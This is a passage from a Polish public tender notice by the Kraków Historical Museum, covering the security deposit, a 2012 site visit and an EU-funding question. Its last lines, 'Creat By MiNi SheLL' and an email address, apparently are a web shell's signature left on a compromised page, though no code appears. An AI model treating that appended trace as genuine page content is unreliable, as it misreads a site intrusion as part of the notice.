a.	W trakcie realizacji umowy wykonawca będzie mógł dokonać zmiany formy zabezpieczenia o ile zaistnieje taka potrzeba na jedną lub kilka form, o których mowa w art. 148 ust. 1 ustawy. Zmiana formy zabezpieczenia będzie musiała być dokonana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.
b.	W terminie 30 dni od dnia wystawienia faktury za ostatni okres rozliczeniowy, Zamawiający zobowiązuje się zwrócić Wykonawcy 100% kwoty określonej w ust. 1 niniejszego paragrafu.

Zamawiający zaleca wykonawcom udział w wizji lokalnej, która odbędzie się 
w dniu 12.04.2012 r. o godzinie 09:00. Zbiórka przed siedzibą Zamawiającego - Muzeum Historyczne Miasta Krakowa, Rynek Główny 35. Osobą odpowiedzialną za przeprowadzenie wizji lokalnej jest pani Joanna Boczoń, tel. kontaktowy (0-12) 42-23-241 lub 61-92-329. Udział w wizji lokalnej nie jest obowiązkowy, jednak ryzyko związane z przygotowaniem oferty ponosi wykonawca..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com